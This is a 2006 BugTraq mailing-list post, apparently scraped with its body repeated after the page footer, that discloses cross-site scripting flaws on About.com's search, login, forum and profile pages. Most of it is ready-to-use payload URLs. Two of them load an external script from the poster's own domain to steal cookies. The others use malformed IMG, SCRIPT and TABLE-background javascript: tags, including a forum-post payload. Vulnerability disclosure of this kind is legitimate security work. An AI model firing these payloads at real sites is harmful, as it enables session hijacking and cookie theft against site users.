BugTraq
Back to list
|
Post reply
About.com - XSS with cookie disclosure
Jun 13 2006 06:36AM
luny youfucktard com
About.com
Homepage:
http://www.about.com
Effected files:
Search input box
fullsearch.htm
shortform.htm
forum.aspx
profile_center.asp
posting in the forum
-----------------------------------
Search input box xss vuln with cookie disclosure:
Works by putting the <script> tags in the input box, or doing url injection. There seemsto be no sanatizing user input here. PoC:
http://search.about.com/fullsearch.htm?terms=<script%20src=http://www.yo
ufucktard.com/xs.js></script>
Screenshots:
http://www.youfucktard.com/xsp/about1.jpg
http://www.youfucktard.com/xsp/about2.jpg
-----------------------------------------
Shortform.htm XSS vuln no filter evasion needed:
http://login.about.com/shortform.htm?Error=<SCRIPT%20SRC=http://youfuckt
ard.com/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/about3.jpg
---------------------------------------------
Forum.aspx xss vuln. Here we have malformed image tags, as well as empty script tags:
PoC:
http://forums.about.com/n/pfx/forum.aspx?nav=messages&tsn=<IMG%20"""><SC
RIPT></SCRIPT>">1&tid=1456">">"><"">'>'>'><"<IMG%20"""><IMG%20"""><SCRIP
T></SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>">"><"<"<"<"<""><"<"<'<'&webta
g=ab-vgstrategies
------------------------------------------------------
Profile_center.asp xss vuln:
http://forums.about.com/dir-app/bbCard/profile_center.asp?webtag=ab-vgst
rategies&cType=2&uName=jonne1234">">"><IMG%20SRC=javascript:alert('XSS')
><"<"<"&dMode=0&eBtn=0&uid=1574961808
------------------------------------------------------
Posting in the forum XSS vuln. This time we'll use the allowed tags <table>. For PoC try posting this in the forum:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<TABLE BACKGROUND="javascript:alert('XSS')">
Screenshots:
http://www.youfucktard.com/xsp/about4.jpg
http://www.youfucktard.com/xsp/about5.jpg
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Homepage:
http://www.about.com
Effected files:
Search input box
fullsearch.htm
shortform.htm
forum.aspx
profile_center.asp
posting in the forum
-----------------------------------
Search input box xss vuln with cookie disclosure:
Works by putting the <script> tags in the input box, or doing url injection. There seemsto be no sanatizing user input here. PoC:
http://search.about.com/fullsearch.htm?terms=<script%20src=http://www.yo
ufucktard.com/xs.js></script>
Screenshots:
http://www.youfucktard.com/xsp/about1.jpg
http://www.youfucktard.com/xsp/about2.jpg
-----------------------------------------
Shortform.htm XSS vuln no filter evasion needed:
http://login.about.com/shortform.htm?Error=<SCRIPT%20SRC=http://youfuckt
ard.com/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/about3.jpg
---------------------------------------------
Forum.aspx xss vuln. Here we have malformed image tags, as well as empty script tags:
PoC:
http://forums.about.com/n/pfx/forum.aspx?nav=messages&tsn=<IMG%20"""><SC
RIPT></SCRIPT>">1&tid=1456">">"><"">'>'>'><"<IMG%20"""><IMG%20"""><SCRIP
T></SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>">"><"<"<"<"<""><"<"<'<'&webta
g=ab-vgstrategies
------------------------------------------------------
Profile_center.asp xss vuln:
http://forums.about.com/dir-app/bbCard/profile_center.asp?webtag=ab-vgst
rategies&cType=2&uName=jonne1234">">"><IMG%20SRC=javascript:alert('XSS')
><"<"<"&dMode=0&eBtn=0&uid=1574961808
------------------------------------------------------
Posting in the forum XSS vuln. This time we'll use the allowed tags <table>. For PoC try posting this in the forum:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<TABLE BACKGROUND="javascript:alert('XSS')">
Screenshots:
http://www.youfucktard.com/xsp/about4.jpg
http://www.youfucktard.com/xsp/about5.jpg
[ reply ]